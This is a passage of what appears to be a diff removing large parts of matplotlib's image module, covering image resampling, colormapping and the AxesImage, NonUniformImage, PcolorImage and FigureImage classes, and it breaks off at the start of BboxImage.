- - *A* may be a greyscale image (M, N) with a dtype of `~numpy.float32`, - `~numpy.float64`, `~numpy.float128`, `~numpy.uint16` or `~numpy.uint8`, - or an (M, N, 4) RGBA image with a dtype of `~numpy.float32`, - `~numpy.float64`, `~numpy.float128`, or `~numpy.uint8`. - - If *unsampled* is True, the image will not be scaled, but an - appropriate affine transformation will be returned instead. - - If *round_to_pixel_border* is True, the output image size will be - rounded to the nearest pixel boundary. This makes the images align - correctly with the axes. It should not be used if exact scaling is - needed, such as for `FigureImage`. - - Returns - ------- - image : (M, N, 4) `numpy.uint8` array - The RGBA image, resampled unless *unsampled* is True. - x, y : float - The upper left corner where the image should be drawn, in pixel - space. - trans : `~matplotlib.transforms.Affine2D` - The affine transformation from image to pixel space. - """ - if A is None: - raise RuntimeError('You must first set the image ' - 'array or the image attribute') - if A.size == 0: - raise RuntimeError("_make_image must get a non-empty image. " - "Your Artist's draw method must filter before " - "this method is called.") - - clipped_bbox = Bbox.intersection(out_bbox, clip_bbox) - - if clipped_bbox is None: - return None, 0, 0, None - - out_width_base = clipped_bbox.width * magnification - out_height_base = clipped_bbox.height * magnification - - if out_width_base == 0 or out_height_base == 0: - return None, 0, 0, None - - if self.origin == 'upper': - # Flip the input image using a transform. This avoids the - # problem with flipping the array, which results in a copy - # when it is converted to contiguous in the C wrapper - t0 = Affine2D().translate(0, -A.shape[0]).scale(1, -1) - else: - t0 = IdentityTransform() - - t0 += ( - Affine2D() - .scale( - in_bbox.width / A.shape[1], - in_bbox.height / A.shape[0]) - .translate(in_bbox.x0, in_bbox.y0) - + self.get_transform()) - - t = (t0 - + (Affine2D() - .translate(-clipped_bbox.x0, -clipped_bbox.y0) - .scale(magnification))) - - # So that the image is aligned with the edge of the axes, we want to - # round up the output width to the next integer. This also means - # scaling the transform slightly to account for the extra subpixel. - if ((not unsampled) and t.is_affine and round_to_pixel_border and - (out_width_base % 1.0 != 0.0 or out_height_base % 1.0 != 0.0)): - out_width = math.ceil(out_width_base) - out_height = math.ceil(out_height_base) - extra_width = (out_width - out_width_base) / out_width_base - extra_height = (out_height - out_height_base) / out_height_base - t += Affine2D().scale(1.0 + extra_width, 1.0 + extra_height) - else: - out_width = int(out_width_base) - out_height = int(out_height_base) - out_shape = (out_height, out_width) - - if not unsampled: - if not (A.ndim == 2 or A.ndim == 3 and A.shape[-1] in (3, 4)): - raise ValueError(f"Invalid shape {A.shape} for image data") - if A.ndim == 2 and self._interpolation_stage != 'rgba': - # if we are a 2D array, then we are running through the - # norm + colormap transformation. However, in general the - # input data is not going to match the size on the screen so we - # have to resample to the correct number of pixels - - # TODO slice input array first - a_min = A.min() - a_max = A.max() - if a_min is np.ma.masked: # All masked; values don't matter. - a_min, a_max = np.int32(0), np.int32(1) - if A.dtype.kind == 'f': # Float dtype: scale to same dtype. 
- scaled_dtype = np.dtype( - np.float64 if A.dtype.itemsize > 4 else np.float32) - if scaled_dtype.itemsize < A.dtype.itemsize: - _api.warn_external(f"Casting input data from {A.dtype}" - f" to {scaled_dtype} for imshow.") - else: # Int dtype, likely. - # Scale to appropriately sized float: use float32 if the - # dynamic range is small, to limit the memory footprint. - da = a_max.astype(np.float64) - a_min.astype(np.float64) - scaled_dtype = np.float64 if da > 1e8 else np.float32 - - # Scale the input data to [.1, .9]. The Agg interpolators clip - # to [0, 1] internally, and we use a smaller input scale to - # identify the interpolated points that need to be flagged as - # over/under. This may introduce numeric instabilities in very - # broadly scaled data. - - # Always copy, and don't allow array subtypes. - A_scaled = np.array(A, dtype=scaled_dtype) - # Clip scaled data around norm if necessary. This is necessary - # for big numbers at the edge of float64's ability to represent - # changes. Applying a norm first would be good, but ruins the - # interpolation of over numbers. - self.norm.autoscale_None(A) - dv = np.float64(self.norm.vmax) - np.float64(self.norm.vmin) - vmid = np.float64(self.norm.vmin) + dv / 2 - fact = 1e7 if scaled_dtype == np.float64 else 1e4 - newmin = vmid - dv * fact - if newmin < a_min: - newmin = None - else: - a_min = np.float64(newmin) - newmax = vmid + dv * fact - if newmax > a_max: - newmax = None - else: - a_max = np.float64(newmax) - if newmax is not None or newmin is not None: - np.clip(A_scaled, newmin, newmax, out=A_scaled) - - # Rescale the raw data to [offset, 1-offset] so that the - # resampling code will run cleanly. Using dyadic numbers here - # could reduce the error, but would not fully eliminate it and - # breaks a number of tests (due to the slightly different - # error bouncing some pixels across a boundary in the (very - # quantized) colormapping step). - offset = .1 - frac = .8 - # Run vmin/vmax through the same rescaling as the raw data; - # otherwise, data values close or equal to the boundaries can - # end up on the wrong side due to floating point error. - vmin, vmax = self.norm.vmin, self.norm.vmax - if vmin is np.ma.masked: - vmin, vmax = a_min, a_max - vrange = np.array([vmin, vmax], dtype=scaled_dtype) - - A_scaled -= a_min - vrange -= a_min - # .item() handles a_min/a_max being ndarray subclasses. - a_min = a_min.astype(scaled_dtype).item() - a_max = a_max.astype(scaled_dtype).item() - - if a_min != a_max: - A_scaled /= ((a_max - a_min) / frac) - vrange /= ((a_max - a_min) / frac) - A_scaled += offset - vrange += offset - # resample the input data to the correct resolution and shape - A_resampled = _resample(self, A_scaled, out_shape, t) - del A_scaled # Make sure we don't use A_scaled anymore! - # Un-scale the resampled data to approximately the original - # range. Things that interpolated to outside the original range - # will still be outside, but possibly clipped in the case of - # higher order interpolation + drastically changing data. 
- A_resampled -= offset - vrange -= offset - if a_min != a_max: - A_resampled *= ((a_max - a_min) / frac) - vrange *= ((a_max - a_min) / frac) - A_resampled += a_min - vrange += a_min - # if using NoNorm, cast back to the original datatype - if isinstance(self.norm, mcolors.NoNorm): - A_resampled = A_resampled.astype(A.dtype) - - mask = (np.where(A.mask, np.float32(np.nan), np.float32(1)) - if A.mask.shape == A.shape # nontrivial mask - else np.ones_like(A, np.float32)) - # we always have to interpolate the mask to account for - # non-affine transformations - out_alpha = _resample(self, mask, out_shape, t, resample=True) - del mask # Make sure we don't use mask anymore! - # Agg updates out_alpha in place. If the pixel has no image - # data it will not be updated (and still be 0 as we initialized - # it), if input data that would go into that output pixel than - # it will be `nan`, if all the input data for a pixel is good - # it will be 1, and if there is _some_ good data in that output - # pixel it will be between [0, 1] (such as a rotated image). - out_mask = np.isnan(out_alpha) - out_alpha[out_mask] = 1 - # Apply the pixel-by-pixel alpha values if present - alpha = self.get_alpha() - if alpha is not None and np.ndim(alpha) > 0: - out_alpha *= _resample(self, alpha, out_shape, - t, resample=True) - # mask and run through the norm - resampled_masked = np.ma.masked_array(A_resampled, out_mask) - # we have re-set the vmin/vmax to account for small errors - # that may have moved input values in/out of range - s_vmin, s_vmax = vrange - if isinstance(self.norm, mcolors.LogNorm) and s_vmin <= 0: - # Don't give 0 or negative values to LogNorm - s_vmin = np.finfo(scaled_dtype).eps - # Block the norm from sending an update signal during the - # temporary vmin/vmax change - with self.norm.callbacks.blocked(), \ - cbook._setattr_cm(self.norm, vmin=s_vmin, vmax=s_vmax): - output = self.norm(resampled_masked) - else: - if A.ndim == 2: # _interpolation_stage == 'rgba' - self.norm.autoscale_None(A) - A = self.to_rgba(A) - if A.shape[2] == 3: - A = _rgb_to_rgba(A) - alpha = self._get_scalar_alpha() - output_alpha = _resample( # resample alpha channel - self, A[..., 3], out_shape, t, alpha=alpha) - output = _resample( # resample rgb channels - self, _rgb_to_rgba(A[..., :3]), out_shape, t, alpha=alpha) - output[..., 3] = output_alpha # recombine rgb and alpha - - # output is now either a 2D array of normed (int or float) data - # or an RGBA array of re-sampled input - output = self.to_rgba(output, bytes=True, norm=False) - # output is now a correctly sized RGBA array of uint8 - - # Apply alpha *after* if the input was greyscale without a mask - if A.ndim == 2: - alpha = self._get_scalar_alpha() - alpha_channel = output[:, :, 3] - alpha_channel[:] = ( # Assignment will cast to uint8. - alpha_channel.astype(np.float32) * out_alpha * alpha) - - else: - if self._imcache is None: - self._imcache = self.to_rgba(A, bytes=True, norm=(A.ndim == 2)) - output = self._imcache - - # Subset the input image to only the part that will be displayed. 
- subset = TransformedBbox(clip_bbox, t0.inverted()).frozen() - output = output[ - int(max(subset.ymin, 0)): - int(min(subset.ymax + 1, output.shape[0])), - int(max(subset.xmin, 0)): - int(min(subset.xmax + 1, output.shape[1]))] - - t = Affine2D().translate( - int(max(subset.xmin, 0)), int(max(subset.ymin, 0))) + t - - return output, clipped_bbox.x0, clipped_bbox.y0, t - - def make_image(self, renderer, magnification=1.0, unsampled=False): - """ - Normalize, rescale, and colormap this image's data for rendering using - *renderer*, with the given *magnification*. - - If *unsampled* is True, the image will not be scaled, but an - appropriate affine transformation will be returned instead. - - Returns - ------- - image : (M, N, 4) `numpy.uint8` array - The RGBA image, resampled unless *unsampled* is True. - x, y : float - The upper left corner where the image should be drawn, in pixel - space. - trans : `~matplotlib.transforms.Affine2D` - The affine transformation from image to pixel space. - """ - raise NotImplementedError('The make_image method must be overridden') - - def _check_unsampled_image(self): - """ - Return whether the image is better to be drawn unsampled. - - The derived class needs to override it. - """ - return False - - @martist.allow_rasterization - def draw(self, renderer, *args, **kwargs): - # if not visible, declare victory and return - if not self.get_visible(): - self.stale = False - return - # for empty images, there is nothing to draw! - if self.get_array().size == 0: - self.stale = False - return - # actually render the image. - gc = renderer.new_gc() - self._set_gc_clip(gc) - gc.set_alpha(self._get_scalar_alpha()) - gc.set_url(self.get_url()) - gc.set_gid(self.get_gid()) - if (renderer.option_scale_image() # Renderer supports transform kwarg. - and self._check_unsampled_image() - and self.get_transform().is_affine): - im, l, b, trans = self.make_image(renderer, unsampled=True) - if im is not None: - trans = Affine2D().scale(im.shape[1], im.shape[0]) + trans - renderer.draw_image(gc, l, b, im, trans) - else: - im, l, b, trans = self.make_image( - renderer, renderer.get_image_magnification()) - if im is not None: - renderer.draw_image(gc, l, b, im) - gc.restore() - self.stale = False - - def contains(self, mouseevent): - """Test whether the mouse event occurred within the image.""" - if (self._different_canvas(mouseevent) - # This doesn't work for figimage. - or not self.axes.contains(mouseevent)[0]): - return False, {} - # TODO: make sure this is consistent with patch and patch - # collection on nonlinear transformed coordinates. - # TODO: consider returning image coordinates (shouldn't - # be too difficult given that the image is rectilinear - trans = self.get_transform().inverted() - x, y = trans.transform([mouseevent.x, mouseevent.y]) - xmin, xmax, ymin, ymax = self.get_extent() - # This checks xmin <= x <= xmax *or* xmax <= x <= xmin. - inside = (x is not None and (x - xmin) * (x - xmax) <= 0 - and y is not None and (y - ymin) * (y - ymax) <= 0) - return inside, {} - - def write_png(self, fname): - """Write the image to png file *fname*.""" - im = self.to_rgba(self._A[::-1] if self.origin == 'lower' else self._A, - bytes=True, norm=True) - PIL.Image.fromarray(im).save(fname, format="png") - - @staticmethod - def _normalize_image_array(A): - """ - Check validity of image-like input *A* and normalize it to a format suitable for - Image subclasses. 
- """ - A = cbook.safe_masked_invalid(A, copy=True) - if A.dtype != np.uint8 and not np.can_cast(A.dtype, float, "same_kind"): - raise TypeError(f"Image data of dtype {A.dtype} cannot be " - f"converted to float") - if A.ndim == 3 and A.shape[-1] == 1: - A = A.squeeze(-1) # If just (M, N, 1), assume scalar and apply colormap. - if not (A.ndim == 2 or A.ndim == 3 and A.shape[-1] in [3, 4]): - raise TypeError(f"Invalid shape {A.shape} for image data") - if A.ndim == 3: - # If the input data has values outside the valid range (after - # normalisation), we issue a warning and then clip X to the bounds - # - otherwise casting wraps extreme values, hiding outliers and - # making reliable interpretation impossible. - high = 255 if np.issubdtype(A.dtype, np.integer) else 1 - if A.min() < 0 or high < A.max(): - _log.warning( - 'Clipping input data to the valid range for imshow with ' - 'RGB data ([0..1] for floats or [0..255] for integers).' - ) - A = np.clip(A, 0, high) - # Cast unsupported integer types to uint8 - if A.dtype != np.uint8 and np.issubdtype(A.dtype, np.integer): - A = A.astype(np.uint8) - return A - - def set_data(self, A): - """ - Set the image array. - - Note that this function does *not* update the normalization used. - - Parameters - ---------- - A : array-like or `PIL.Image.Image` - """ - if isinstance(A, PIL.Image.Image): - A = pil_to_array(A) # Needed e.g. to apply png palette. - self._A = self._normalize_image_array(A) - self._imcache = None - self.stale = True - - def set_array(self, A): - """ - Retained for backwards compatibility - use set_data instead. - - Parameters - ---------- - A : array-like - """ - # This also needs to be here to override the inherited - # cm.ScalarMappable.set_array method so it is not invoked by mistake. - self.set_data(A) - - def get_interpolation(self): - """ - Return the interpolation method the image uses when resizing. - - One of 'antialiased', 'nearest', 'bilinear', 'bicubic', 'spline16', - 'spline36', 'hanning', 'hamming', 'hermite', 'kaiser', 'quadric', - 'catrom', 'gaussian', 'bessel', 'mitchell', 'sinc', 'lanczos', - or 'none'. - """ - return self._interpolation - - def set_interpolation(self, s): - """ - Set the interpolation method the image uses when resizing. - - If None, use :rc:`image.interpolation`. If 'none', the image is - shown as is without interpolating. 'none' is only supported in - agg, ps and pdf backends and will fall back to 'nearest' mode - for other backends. - - Parameters - ---------- - s : {'antialiased', 'nearest', 'bilinear', 'bicubic', 'spline16', \ -'spline36', 'hanning', 'hamming', 'hermite', 'kaiser', 'quadric', 'catrom', \ -'gaussian', 'bessel', 'mitchell', 'sinc', 'lanczos', 'none'} or None - """ - s = mpl._val_or_rc(s, 'image.interpolation').lower() - _api.check_in_list(interpolations_names, interpolation=s) - self._interpolation = s - self.stale = True - - def set_interpolation_stage(self, s): - """ - Set when interpolation happens during the transform to RGBA. - - Parameters - ---------- - s : {'data', 'rgba'} or None - Whether to apply up/downsampling interpolation in data or RGBA - space. 
- """ - if s is None: - s = "data" # placeholder for maybe having rcParam - _api.check_in_list(['data', 'rgba'], s=s) - self._interpolation_stage = s - self.stale = True - - def can_composite(self): - """Return whether the image can be composited with its neighbors.""" - trans = self.get_transform() - return ( - self._interpolation != 'none' and - trans.is_affine and - trans.is_separable) - - def set_resample(self, v): - """ - Set whether image resampling is used. - - Parameters - ---------- - v : bool or None - If None, use :rc:`image.resample`. - """ - v = mpl._val_or_rc(v, 'image.resample') - self._resample = v - self.stale = True - - def get_resample(self): - """Return whether image resampling is used.""" - return self._resample - - def set_filternorm(self, filternorm): - """ - Set whether the resize filter normalizes the weights. - - See help for `~.Axes.imshow`. - - Parameters - ---------- - filternorm : bool - """ - self._filternorm = bool(filternorm) - self.stale = True - - def get_filternorm(self): - """Return whether the resize filter normalizes the weights.""" - return self._filternorm - - def set_filterrad(self, filterrad): - """ - Set the resize filter radius only applicable to some - interpolation schemes -- see help for imshow - - Parameters - ---------- - filterrad : positive float - """ - r = float(filterrad) - if r <= 0: - raise ValueError("The filter radius must be a positive number") - self._filterrad = r - self.stale = True - - def get_filterrad(self): - """Return the filterrad setting.""" - return self._filterrad - - -class AxesImage(_ImageBase): - """ - An image attached to an Axes. - - Parameters - ---------- - ax : `~matplotlib.axes.Axes` - The axes the image will belong to. - cmap : str or `~matplotlib.colors.Colormap`, default: :rc:`image.cmap` - The Colormap instance or registered colormap name used to map scalar - data to colors. - norm : str or `~matplotlib.colors.Normalize` - Maps luminance to 0-1. - interpolation : str, default: :rc:`image.interpolation` - Supported values are 'none', 'antialiased', 'nearest', 'bilinear', - 'bicubic', 'spline16', 'spline36', 'hanning', 'hamming', 'hermite', - 'kaiser', 'quadric', 'catrom', 'gaussian', 'bessel', 'mitchell', - 'sinc', 'lanczos', 'blackman'. - interpolation_stage : {'data', 'rgba'}, default: 'data' - If 'data', interpolation - is carried out on the data provided by the user. If 'rgba', the - interpolation is carried out after the colormapping has been - applied (visual interpolation). - origin : {'upper', 'lower'}, default: :rc:`image.origin` - Place the [0, 0] index of the array in the upper left or lower left - corner of the axes. The convention 'upper' is typically used for - matrices and images. - extent : tuple, optional - The data axes (left, right, bottom, top) for making image plots - registered with data plots. Default is to label the pixel - centers with the zero-based row and column indices. - filternorm : bool, default: True - A parameter for the antigrain image resize filter - (see the antigrain documentation). - If filternorm is set, the filter normalizes integer values and corrects - the rounding errors. It doesn't do anything with the source floating - point values, it corrects only integers according to the rule of 1.0 - which means that any sum of pixel weights must be equal to 1.0. So, - the filter function must produce a graph of the proper shape. - filterrad : float > 0, default: 4 - The filter radius for filters that have a radius parameter, i.e. 
when - interpolation is one of: 'sinc', 'lanczos' or 'blackman'. - resample : bool, default: False - When True, use a full resampling method. When False, only resample when - the output image is larger than the input image. - **kwargs : `~matplotlib.artist.Artist` properties - """ - - def __init__(self, ax, - *, - cmap=None, - norm=None, - interpolation=None, - origin=None, - extent=None, - filternorm=True, - filterrad=4.0, - resample=False, - interpolation_stage=None, - **kwargs - ): - - self._extent = extent - - super().__init__( - ax, - cmap=cmap, - norm=norm, - interpolation=interpolation, - origin=origin, - filternorm=filternorm, - filterrad=filterrad, - resample=resample, - interpolation_stage=interpolation_stage, - **kwargs - ) - - def get_window_extent(self, renderer=None): - x0, x1, y0, y1 = self._extent - bbox = Bbox.from_extents([x0, y0, x1, y1]) - return bbox.transformed(self.get_transform()) - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - trans = self.get_transform() - # image is created in the canvas coordinate. - x1, x2, y1, y2 = self.get_extent() - bbox = Bbox(np.array([[x1, y1], [x2, y2]])) - transformed_bbox = TransformedBbox(bbox, trans) - clip = ((self.get_clip_box() or self.axes.bbox) if self.get_clip_on() - else self.figure.bbox) - return self._make_image(self._A, bbox, transformed_bbox, clip, - magnification, unsampled=unsampled) - - def _check_unsampled_image(self): - """Return whether the image would be better drawn unsampled.""" - return self.get_interpolation() == "none" - - def set_extent(self, extent, **kwargs): - """ - Set the image extent. - - Parameters - ---------- - extent : 4-tuple of float - The position and size of the image as tuple - ``(left, right, bottom, top)`` in data coordinates. - **kwargs - Other parameters from which unit info (i.e., the *xunits*, - *yunits*, *zunits* (for 3D axes), *runits* and *thetaunits* (for - polar axes) entries are applied, if present. - - Notes - ----- - This updates ``ax.dataLim``, and, if autoscaling, sets ``ax.viewLim`` - to tightly fit the image, regardless of ``dataLim``. Autoscaling - state is not changed, so following this with ``ax.autoscale_view()`` - will redo the autoscaling in accord with ``dataLim``. 
- """ - (xmin, xmax), (ymin, ymax) = self.axes._process_unit_info( - [("x", [extent[0], extent[1]]), - ("y", [extent[2], extent[3]])], - kwargs) - if kwargs: - raise _api.kwarg_error("set_extent", kwargs) - xmin = self.axes._validate_converted_limits( - xmin, self.convert_xunits) - xmax = self.axes._validate_converted_limits( - xmax, self.convert_xunits) - ymin = self.axes._validate_converted_limits( - ymin, self.convert_yunits) - ymax = self.axes._validate_converted_limits( - ymax, self.convert_yunits) - extent = [xmin, xmax, ymin, ymax] - - self._extent = extent - corners = (xmin, ymin), (xmax, ymax) - self.axes.update_datalim(corners) - self.sticky_edges.x[:] = [xmin, xmax] - self.sticky_edges.y[:] = [ymin, ymax] - if self.axes.get_autoscalex_on(): - self.axes.set_xlim((xmin, xmax), auto=None) - if self.axes.get_autoscaley_on(): - self.axes.set_ylim((ymin, ymax), auto=None) - self.stale = True - - def get_extent(self): - """Return the image extent as tuple (left, right, bottom, top).""" - if self._extent is not None: - return self._extent - else: - sz = self.get_size() - numrows, numcols = sz - if self.origin == 'upper': - return (-0.5, numcols-0.5, numrows-0.5, -0.5) - else: - return (-0.5, numcols-0.5, -0.5, numrows-0.5) - - def get_cursor_data(self, event): - """ - Return the image value at the event position or *None* if the event is - outside the image. - - See Also - -------- - matplotlib.artist.Artist.get_cursor_data - """ - xmin, xmax, ymin, ymax = self.get_extent() - if self.origin == 'upper': - ymin, ymax = ymax, ymin - arr = self.get_array() - data_extent = Bbox([[xmin, ymin], [xmax, ymax]]) - array_extent = Bbox([[0, 0], [arr.shape[1], arr.shape[0]]]) - trans = self.get_transform().inverted() - trans += BboxTransform(boxin=data_extent, boxout=array_extent) - point = trans.transform([event.x, event.y]) - if any(np.isnan(point)): - return None - j, i = point.astype(int) - # Clip the coordinates at array bounds - if not (0 <= i < arr.shape[0]) or not (0 <= j < arr.shape[1]): - return None - else: - return arr[i, j] - - -class NonUniformImage(AxesImage): - mouseover = False # This class still needs its own get_cursor_data impl. - - def __init__(self, ax, *, interpolation='nearest', **kwargs): - """ - Parameters - ---------- - ax : `~matplotlib.axes.Axes` - The axes the image will belong to. - interpolation : {'nearest', 'bilinear'}, default: 'nearest' - The interpolation scheme used in the resampling. - **kwargs - All other keyword arguments are identical to those of `.AxesImage`. - """ - super().__init__(ax, **kwargs) - self.set_interpolation(interpolation) - - def _check_unsampled_image(self): - """Return False. 
Do not use unsampled image.""" - return False - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - if self._A is None: - raise RuntimeError('You must first set the image array') - if unsampled: - raise ValueError('unsampled not supported on NonUniformImage') - A = self._A - if A.ndim == 2: - if A.dtype != np.uint8: - A = self.to_rgba(A, bytes=True) - else: - A = np.repeat(A[:, :, np.newaxis], 4, 2) - A[:, :, 3] = 255 - else: - if A.dtype != np.uint8: - A = (255*A).astype(np.uint8) - if A.shape[2] == 3: - B = np.zeros(tuple([*A.shape[0:2], 4]), np.uint8) - B[:, :, 0:3] = A - B[:, :, 3] = 255 - A = B - vl = self.axes.viewLim - l, b, r, t = self.axes.bbox.extents - width = int(((round(r) + 0.5) - (round(l) - 0.5)) * magnification) - height = int(((round(t) + 0.5) - (round(b) - 0.5)) * magnification) - x_pix = np.linspace(vl.x0, vl.x1, width) - y_pix = np.linspace(vl.y0, vl.y1, height) - if self._interpolation == "nearest": - x_mid = (self._Ax[:-1] + self._Ax[1:]) / 2 - y_mid = (self._Ay[:-1] + self._Ay[1:]) / 2 - x_int = x_mid.searchsorted(x_pix) - y_int = y_mid.searchsorted(y_pix) - # The following is equal to `A[y_int[:, None], x_int[None, :]]`, - # but many times faster. Both casting to uint32 (to have an - # effectively 1D array) and manual index flattening matter. - im = ( - np.ascontiguousarray(A).view(np.uint32).ravel()[ - np.add.outer(y_int * A.shape[1], x_int)] - .view(np.uint8).reshape((height, width, 4))) - else: # self._interpolation == "bilinear" - # Use np.interp to compute x_int/x_float has similar speed. - x_int = np.clip( - self._Ax.searchsorted(x_pix) - 1, 0, len(self._Ax) - 2) - y_int = np.clip( - self._Ay.searchsorted(y_pix) - 1, 0, len(self._Ay) - 2) - idx_int = np.add.outer(y_int * A.shape[1], x_int) - x_frac = np.clip( - np.divide(x_pix - self._Ax[x_int], np.diff(self._Ax)[x_int], - dtype=np.float32), # Downcasting helps with speed. - 0, 1) - y_frac = np.clip( - np.divide(y_pix - self._Ay[y_int], np.diff(self._Ay)[y_int], - dtype=np.float32), - 0, 1) - f00 = np.outer(1 - y_frac, 1 - x_frac) - f10 = np.outer(y_frac, 1 - x_frac) - f01 = np.outer(1 - y_frac, x_frac) - f11 = np.outer(y_frac, x_frac) - im = np.empty((height, width, 4), np.uint8) - for chan in range(4): - ac = A[:, :, chan].reshape(-1) # reshape(-1) avoids a copy. - # Shifting the buffer start (`ac[offset:]`) avoids an array - # addition (`ac[idx_int + offset]`). - buf = f00 * ac[idx_int] - buf += f10 * ac[A.shape[1]:][idx_int] - buf += f01 * ac[1:][idx_int] - buf += f11 * ac[A.shape[1] + 1:][idx_int] - im[:, :, chan] = buf # Implicitly casts to uint8. - return im, l, b, IdentityTransform() - - def set_data(self, x, y, A): - """ - Set the grid for the pixel centers, and the pixel values. - - Parameters - ---------- - x, y : 1D array-like - Monotonic arrays of shapes (N,) and (M,), respectively, specifying - pixel centers. - A : array-like - (M, N) `~numpy.ndarray` or masked array of values to be - colormapped, or (M, N, 3) RGB array, or (M, N, 4) RGBA array. 
- """ - A = self._normalize_image_array(A) - x = np.array(x, np.float32) - y = np.array(y, np.float32) - if not (x.ndim == y.ndim == 1 and A.shape[:2] == y.shape + x.shape): - raise TypeError("Axes don't match array shape") - self._A = A - self._Ax = x - self._Ay = y - self._imcache = None - self.stale = True - - def set_array(self, *args): - raise NotImplementedError('Method not supported') - - def set_interpolation(self, s): - """ - Parameters - ---------- - s : {'nearest', 'bilinear'} or None - If None, use :rc:`image.interpolation`. - """ - if s is not None and s not in ('nearest', 'bilinear'): - raise NotImplementedError('Only nearest neighbor and ' - 'bilinear interpolations are supported') - super().set_interpolation(s) - - def get_extent(self): - if self._A is None: - raise RuntimeError('Must set data first') - return self._Ax[0], self._Ax[-1], self._Ay[0], self._Ay[-1] - - @_api.rename_parameter("3.8", "s", "filternorm") - def set_filternorm(self, filternorm): - pass - - @_api.rename_parameter("3.8", "s", "filterrad") - def set_filterrad(self, filterrad): - pass - - def set_norm(self, norm): - if self._A is not None: - raise RuntimeError('Cannot change colors after loading data') - super().set_norm(norm) - - def set_cmap(self, cmap): - if self._A is not None: - raise RuntimeError('Cannot change colors after loading data') - super().set_cmap(cmap) - - -class PcolorImage(AxesImage): - """ - Make a pcolor-style plot with an irregular rectangular grid. - - This uses a variation of the original irregular image code, - and it is used by pcolorfast for the corresponding grid type. - """ - - def __init__(self, ax, - x=None, - y=None, - A=None, - *, - cmap=None, - norm=None, - **kwargs - ): - """ - Parameters - ---------- - ax : `~matplotlib.axes.Axes` - The axes the image will belong to. - x, y : 1D array-like, optional - Monotonic arrays of length N+1 and M+1, respectively, specifying - rectangle boundaries. If not given, will default to - ``range(N + 1)`` and ``range(M + 1)``, respectively. - A : array-like - The data to be color-coded. The interpretation depends on the - shape: - - - (M, N) `~numpy.ndarray` or masked array: values to be colormapped - - (M, N, 3): RGB array - - (M, N, 4): RGBA array - - cmap : str or `~matplotlib.colors.Colormap`, default: :rc:`image.cmap` - The Colormap instance or registered colormap name used to map - scalar data to colors. - norm : str or `~matplotlib.colors.Normalize` - Maps luminance to 0-1. 
- **kwargs : `~matplotlib.artist.Artist` properties - """ - super().__init__(ax, norm=norm, cmap=cmap) - self._internal_update(kwargs) - if A is not None: - self.set_data(x, y, A) - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - if self._A is None: - raise RuntimeError('You must first set the image array') - if unsampled: - raise ValueError('unsampled not supported on PColorImage') - - if self._imcache is None: - A = self.to_rgba(self._A, bytes=True) - self._imcache = np.pad(A, [(1, 1), (1, 1), (0, 0)], "constant") - padded_A = self._imcache - bg = mcolors.to_rgba(self.axes.patch.get_facecolor(), 0) - bg = (np.array(bg) * 255).astype(np.uint8) - if (padded_A[0, 0] != bg).all(): - padded_A[[0, -1], :] = padded_A[:, [0, -1]] = bg - - l, b, r, t = self.axes.bbox.extents - width = (round(r) + 0.5) - (round(l) - 0.5) - height = (round(t) + 0.5) - (round(b) - 0.5) - width = round(width * magnification) - height = round(height * magnification) - vl = self.axes.viewLim - - x_pix = np.linspace(vl.x0, vl.x1, width) - y_pix = np.linspace(vl.y0, vl.y1, height) - x_int = self._Ax.searchsorted(x_pix) - y_int = self._Ay.searchsorted(y_pix) - im = ( # See comment in NonUniformImage.make_image re: performance. - padded_A.view(np.uint32).ravel()[ - np.add.outer(y_int * padded_A.shape[1], x_int)] - .view(np.uint8).reshape((height, width, 4))) - return im, l, b, IdentityTransform() - - def _check_unsampled_image(self): - return False - - def set_data(self, x, y, A): - """ - Set the grid for the rectangle boundaries, and the data values. - - Parameters - ---------- - x, y : 1D array-like, optional - Monotonic arrays of length N+1 and M+1, respectively, specifying - rectangle boundaries. If not given, will default to - ``range(N + 1)`` and ``range(M + 1)``, respectively. - A : array-like - The data to be color-coded. The interpretation depends on the - shape: - - - (M, N) `~numpy.ndarray` or masked array: values to be colormapped - - (M, N, 3): RGB array - - (M, N, 4): RGBA array - """ - A = self._normalize_image_array(A) - x = np.arange(0., A.shape[1] + 1) if x is None else np.array(x, float).ravel() - y = np.arange(0., A.shape[0] + 1) if y is None else np.array(y, float).ravel() - if A.shape[:2] != (y.size - 1, x.size - 1): - raise ValueError( - "Axes don't match array shape. Got %s, expected %s." % - (A.shape[:2], (y.size - 1, x.size - 1))) - # For efficient cursor readout, ensure x and y are increasing. 
- if x[-1] < x[0]: - x = x[::-1] - A = A[:, ::-1] - if y[-1] < y[0]: - y = y[::-1] - A = A[::-1] - self._A = A - self._Ax = x - self._Ay = y - self._imcache = None - self.stale = True - - def set_array(self, *args): - raise NotImplementedError('Method not supported') - - def get_cursor_data(self, event): - # docstring inherited - x, y = event.xdata, event.ydata - if (x < self._Ax[0] or x > self._Ax[-1] or - y < self._Ay[0] or y > self._Ay[-1]): - return None - j = np.searchsorted(self._Ax, x) - 1 - i = np.searchsorted(self._Ay, y) - 1 - try: - return self._A[i, j] - except IndexError: - return None - - -class FigureImage(_ImageBase): - """An image attached to a figure.""" - - zorder = 0 - - _interpolation = 'nearest' - - def __init__(self, fig, - *, - cmap=None, - norm=None, - offsetx=0, - offsety=0, - origin=None, - **kwargs - ): - """ - cmap is a colors.Colormap instance - norm is a colors.Normalize instance to map luminance to 0-1 - - kwargs are an optional list of Artist keyword args - """ - super().__init__( - None, - norm=norm, - cmap=cmap, - origin=origin - ) - self.figure = fig - self.ox = offsetx - self.oy = offsety - self._internal_update(kwargs) - self.magnification = 1.0 - - def get_extent(self): - """Return the image extent as tuple (left, right, bottom, top).""" - numrows, numcols = self.get_size() - return (-0.5 + self.ox, numcols-0.5 + self.ox, - -0.5 + self.oy, numrows-0.5 + self.oy) - - def make_image(self, renderer, magnification=1.0, unsampled=False): - # docstring inherited - fac = renderer.dpi/self.figure.dpi - # fac here is to account for pdf, eps, svg backends where - # figure.dpi is set to 72. This means we need to scale the - # image (using magnification) and offset it appropriately. - bbox = Bbox([[self.ox/fac, self.oy/fac], - [(self.ox/fac + self._A.shape[1]), - (self.oy/fac + self._A.shape[0])]]) - width, height = self.figure.get_size_inches() - width *= renderer.dpi - height *= renderer.dpi - clip = Bbox([[0, 0], [width, height]]) - return self._make_image( - self._A, bbox, bbox, clip, magnification=magnification / fac, - unsampled=unsampled, round_to_pixel_border=False) - - def set_data(self, A): - """Set the image array.""" - cm.ScalarMappable.set_array(self, A) - self.stale = True - - -class BboxImage(_ImageBase): - """The Image class whose size is determined by the given bbox.""" - - def __init__(self, 